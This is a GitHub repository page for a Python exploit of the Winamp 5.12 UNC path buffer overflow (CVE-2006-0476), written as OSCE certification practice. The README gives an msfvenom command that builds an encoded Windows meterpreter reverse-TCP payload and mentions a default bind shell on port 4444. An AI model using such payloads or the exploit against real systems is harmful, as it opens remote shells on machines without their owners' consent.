Skip to content

uzeyirdestan/Winamp-5.12-Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 

Repository files navigation

Winamp-5.12-Exploit

Winamp 5.12 UNC Path Buffer Overflow Exploit for Python

For preparing OSCE, I made a python script for CVE-2006-0476 exploit. You can create your own payload with eg

msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=4444 -a x86 --platform windows -f raw -e x86/alpha_mixed > payload

You need to create your own payload. Default one is bind shell at port 4444

About

Winamp 5.12 UNC Path Buffer Overflow Exploit for Python

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages